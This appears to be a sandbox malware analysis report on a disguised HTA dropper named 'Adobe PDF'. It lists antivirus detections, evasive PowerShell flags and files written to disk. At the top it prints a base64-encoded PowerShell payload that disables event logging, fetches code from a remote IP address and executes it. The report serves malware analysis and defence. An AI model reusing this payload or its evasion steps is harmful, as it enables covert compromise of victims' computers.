AG8AbQBhAHQAaQAnACsAJwBvAG4ALgBUAHIAYQBjACcAKwAnAGkAbgBnAC4AUAAnACsAJwBTAEUAdAB3AEwAJwArACcAbwBnACcAKwAnAFAAcgBvACcAKwAnAHYAaQAnACsAJwBkACcAKwAnAGUAJwArACcAcgAnACkAKQAuACIAZwBFAHQAZgBgAGkAZQBMAEQAIgAoACgAJwBlAHQAdwBQAHIAbwB2AGkAJwArACcAZABlACcAKwAnAHIAJwApACwAKAAnAE4AbwBuACcAKwAnAFAAJwArACcAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApACkALgAiAFMAZQBgAFQAVgBBAEwAYABVAGUAIgAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4ARQB2AGUAbgB0AGkAbgBnAC4ARQB2AGUAbgB0AFAAcgBvAHYAaQBkAGUAcgAoAE4AZQB3AC0ARwB1AGkAZAApACkAKQA7ACQAdwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgB3AGUAYgByAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwADoALwAvADgAMwAuADEAMwA4AC4ANQAzAC4AMQA4ADYALwAxAC4AdAB4AHQAJwApADsAJAByAD0AJAB3AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAcwA9ACQAcgAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAGUAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHMAKQA7ACQAYwA9ACQAZQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACYAKAAnACcALgBTAHUAYgBTAHQAcgBpAG4AZwAuAFQAbwBTAHQAcgBpAG4AZwAoACkAWwA2ADcALAA3ADIALAA2ADQAXQAtAEoAbwBpAG4AJwAnACkAJABjAA==" filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 30, 2025, 1:55 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Creates a suspicious Powershell process (10 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

CTX	html.trojan.resimov
Skyhigh	BehavesLike.HTML.Dropper.zr
ALYac	VBS.Heur.Asthma.2.02530CCC.Gen
VIPRE	VBS.Heur.Asthma.2.02530CCC.Gen
Arcabit	VBS.Heur.Asthma.2.02530CCC.Gen
Symantec	ISB.Downloader!gen63
ESET-NOD32	JS/Resimov.E suspicious
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VBS.Heur.Asthma.2.02530CCC.Gen
MicroWorld-eScan	VBS.Heur.Asthma.2.02530CCC.Gen
Rising	Downloader.Agent/VBS!1.EB5F (CLASSIC)
Emsisoft	VBS.Heur.Asthma.2.02530CCC.Gen (B)
F-Secure	Trojan:W32/SuspiciousHTADropper.B
Google	Detected
Antiy-AVL	Trojan/JS.Resimov
GData	VBS.Heur.Asthma.2.02530CCC.Gen
Varist	XML/ABApplication.PGB
McAfee	HTool-HTALoader.a
Tencent	Script.Trojan-Downloader.Generic.Vmhl
huorong	Backdoor/Meterpreter.p
alibabacloud	Trojan[downloader]:Javascript/Resimov.E

Adobe%20PDF.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All